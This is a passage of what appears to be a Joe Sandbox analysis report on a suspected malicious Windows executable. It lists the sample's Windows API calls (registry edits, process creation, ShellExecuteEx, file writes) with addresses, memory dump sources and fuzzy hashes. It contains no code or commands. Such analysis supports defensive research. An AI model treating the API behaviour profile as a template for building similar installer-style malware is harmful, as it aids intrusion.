                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID:
                          • API String ID: 3850602802-0
                          • Opcode ID: 474f208232398db7832ae6cf9476e67801d30c6119a1d360729805140dd2eec7
                          • Instruction ID: 24bc9e5fc202ee3a806e10c5c4c435a115486d70a18619fa80b37f59caf4cc8f
                          • Opcode Fuzzy Hash: 474f208232398db7832ae6cf9476e67801d30c6119a1d360729805140dd2eec7
                          • Instruction Fuzzy Hash: FE012472B142319BD7296F28AC08B2A2689A790711F15053EF501F72F2E7B89C02839C
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040261E
                          • RegCloseKey.ADVAPI32(00000000), ref: 00402627
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: CloseDeleteValue
                          • String ID:
                          • API String ID: 2831762973-0
                          • Opcode ID: f96e188a7ae5a14e42d54c9d4e205f70772fa1d97c018549f93087146f294a9c
                          • Instruction ID: 1bcbad1c68f0b46bba20496b2b31256c8d917196160abd42dbdf13e8463e21ca
                          • Opcode Fuzzy Hash: f96e188a7ae5a14e42d54c9d4e205f70772fa1d97c018549f93087146f294a9c
                          • Instruction Fuzzy Hash: C4F02433645601A7E210ABA49D4AA7E765DAB903A2F11053FF642A61C4CE7E8C46862D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CreateDirectoryW.KERNELBASE(00000000,?,?), ref: 00405EB5
                          • GetLastError.KERNEL32 ref: 00405EBF
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: CreateDirectoryErrorLast
                          • String ID:
                          • API String ID: 1375471231-0
                          • Opcode ID: ef575f64b3f91d1faec8ab34c66b023bfb37b06c8571540b2f759fabd0b6ecc5
                          • Instruction ID: 9ca6e340be766cb2c12845df8df972746f874c79875584cc98d0422f44504a32
                          • Opcode Fuzzy Hash: ef575f64b3f91d1faec8ab34c66b023bfb37b06c8571540b2f759fabd0b6ecc5
                          • Instruction Fuzzy Hash: B8F0A975D003099FDB409FE5D98469EBBB4FB08304F10813AD655F6240E77496448F99
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00424A20,?,?,?,Pata c",?), ref: 00406725
                          • CloseHandle.KERNEL32(?,?,?,Pata c",?), ref: 00406732
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: CloseCreateHandleProcess
                          • String ID:
                          • API String ID: 3712363035-0
                          • Opcode ID: 273c1fa7d1aa044bd9c3ab863e2c50d84ab0076036b9951186af03cb5be5a70a
                          • Instruction ID: 0a50308f4e5417437e0e41f78ffb2c0003d64207cbf72350d3c769349771434a
                          • Opcode Fuzzy Hash: 273c1fa7d1aa044bd9c3ab863e2c50d84ab0076036b9951186af03cb5be5a70a
                          • Instruction Fuzzy Hash: E5E04FB06001197FEB009B64ED06F7B776CEB10604F404435BE11E6150DB7498149E6C
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetFileAttributesW.KERNELBASE(00000003,0040340A,C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe,80000000,00000003,?,?,?,?,?), ref: 00406945
                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000,?,?,?,?,?), ref: 00406965
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: File$AttributesCreate
                          • String ID:
                          • API String ID: 415043291-0
                          • Opcode ID: f6b7e41df0685c4d87fd176133b42d9659901a1392ff5a6db3843eb4367b1fa6
                          • Instruction ID: 4ae5381cac1a5692e563b2ee8488c5ee90d5112b7c435f43d555caeb0d796870
                          • Opcode Fuzzy Hash: f6b7e41df0685c4d87fd176133b42d9659901a1392ff5a6db3843eb4367b1fa6
                          • Instruction Fuzzy Hash: 01D09E71118201AEDF054F20DE4AF1E7A65EF84720F114A2CF5A2D40F0DA718865AA11
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetFileAttributesW.KERNELBASE(?,?,004065B7,?,?,00000000,004068D4,?,?,?,?), ref: 00406BC8
                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406BDF
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: 196e45e2008971472f20fc54261bbb41ab7d3684cfcaad04ae8c55cb7c580a85
                          • Instruction ID: bc143518a886d0da5f3323849e6096d7a2261ce03bdbbe77323b2ad93cd1fddc
                          • Opcode Fuzzy Hash: 196e45e2008971472f20fc54261bbb41ab7d3684cfcaad04ae8c55cb7c580a85
                          • Instruction Fuzzy Hash: 3BD0C7765045306BC6141728DD0C45A7A51DF853717154739B5F6A62F0DB315C628694
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,000003FF,00000000), ref: 004025E1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: PrivateProfileString
                          • String ID:
                          • API String ID: 1096422788-0
                          • Opcode ID: 22516cbd50d66d69165365f74973f920607c9044153fbe0373c22fc75c416c2b
                          • Instruction ID: 4a55a9e7f5621efaed35dedf74b5271bfaa34f3e59f0aefbd8a146d543201646
                          • Opcode Fuzzy Hash: 22516cbd50d66d69165365f74973f920607c9044153fbe0373c22fc75c416c2b
                          • Instruction Fuzzy Hash: 71F090326443446BD310DFA1DC84A6AB39CFB44365F104A3AFA559B1C1E7B89A058366
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 004025A1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: PrivateProfileStringWrite
                          • String ID:
                          • API String ID: 390214022-0
                          • Opcode ID: cc31bd972c378d31ca8ace9f1a7b6022b871ff5c5f93a71e74b8966d42eb1a6a
                          • Instruction ID: 9c0c34e48b3cd51ebf4fc9d6d8f3c465cde9ed9ce60f26cb06ea3e30feb9d0dc
                          • Opcode Fuzzy Hash: cc31bd972c378d31ca8ace9f1a7b6022b871ff5c5f93a71e74b8966d42eb1a6a
                          • Instruction Fuzzy Hash: 9AE09A32501394BED6303A738D09E2B398C5B407A2B65023FB806B23CAE9B98E01812D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000,004031A2,00000004,00000004,00000000,00000000,00000000,00000000), ref: 00406985
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          • Opcode ID: 11e98501215263af6d8f2170805d6017c1d35df30ce3e57717fa887770caa038
                          • Instruction ID: aed7c9a4cde95c8ec0d72e517339a00ec8eb68e6dfc00f227df730fbf65e67e0
                          • Opcode Fuzzy Hash: 11e98501215263af6d8f2170805d6017c1d35df30ce3e57717fa887770caa038
                          • Instruction Fuzzy Hash: D8E04F72200018BB8F218F5ACC04D9FFF6CEF926A07024026B805A6110D270EA11C6F4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,?,004149E0,00403323,?,004149E0,?,004149E0,?,00000004), ref: 00406A48
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: FileWrite
                          • String ID:
                          • API String ID: 3934441357-0
                          • Opcode ID: 1a43bcc941cc04eb1e69e090e0c8f39a142cdc837d48c7fe24322eecdb3138e1
                          • Instruction ID: 450276b5292395e7f32ec829e469ad42f07e3747de73e15cc9c10c666468ed89
                          • Opcode Fuzzy Hash: 1a43bcc941cc04eb1e69e090e0c8f39a142cdc837d48c7fe24322eecdb3138e1
                          • Instruction Fuzzy Hash: 6AE04F32200129BB8F20AF4ACC04D9FBF6DEF926A07014026B805A2110D274EA11CBE4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?), ref: 004062F4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: Create
                          • String ID:
                          • API String ID: 2289755597-0
                          • Opcode ID: f8030829f1ed8b951c28ec30d4765995d416a1c1369088578c48a055121a99d9
                          • Instruction ID: 49280b0a6b06cb610c03c26c9e7c2c5240378bbf018279cbed56ec9ee8610ed3
                          • Opcode Fuzzy Hash: f8030829f1ed8b951c28ec30d4765995d416a1c1369088578c48a055121a99d9
                          • Instruction Fuzzy Hash: B7E0B6B2010209BEEF09AF91ED0ADBB3B2DEB08214F01453EF91695091E6B5E930A664
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,?,00000000,00000800,?,?,004069CB,00000800,?,?,?,: Completed,00000000,00000000), ref: 00406322
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: Open
                          • String ID:
                          • API String ID: 71445658-0
                          • Opcode ID: 646f33df675fa4cf08bc3aa6274970f57b76d5a0886e9b9dad29ac5a7ae8d0f5
                          • Instruction ID: ae38020bbd6ebd8b202908859428589a2a4854f21eb921252e4c09416ec354b8
                          • Opcode Fuzzy Hash: 646f33df675fa4cf08bc3aa6274970f57b76d5a0886e9b9dad29ac5a7ae8d0f5
                          • Instruction Fuzzy Hash: 1AD0123204020DBBDF115F909D01FAB3B6DEB18350F014426FE16A9091D775D530AB64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040552F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID:
                          • API String ID: 3850602802-0
                          • Opcode ID: cab6be965bc0ff0afa931026560f264918c84608a59ba459c7a9b22b08acd09e
                          • Instruction ID: a55095c29797d5fff0df8dbac6fb81d278a6abc40cb3e873ad7111107cb3a841
                          • Opcode Fuzzy Hash: cab6be965bc0ff0afa931026560f264918c84608a59ba459c7a9b22b08acd09e
                          • Instruction Fuzzy Hash: ECC04CB17406027BEA20AB619E09F077759A760700F50846D7244A51D4EA74F514CA1C
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • ShellExecuteExW.SHELL32(?), ref: 00406A28
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: ExecuteShell
                          • String ID:
                          • API String ID: 587946157-0
                          • Opcode ID: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
                          • Instruction ID: 080962bbef7e268e86b0d243ececfcd1ad47764945baea7f73af6130fa7b9bd6
                          • Opcode Fuzzy Hash: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
                          • Instruction Fuzzy Hash: A9C092F2100201EFE301CF80CB09F067BE8AF54306F028058E1899A060CB788800CB29
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004035B2,?,?,?,?,?,?), ref: 0040313F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
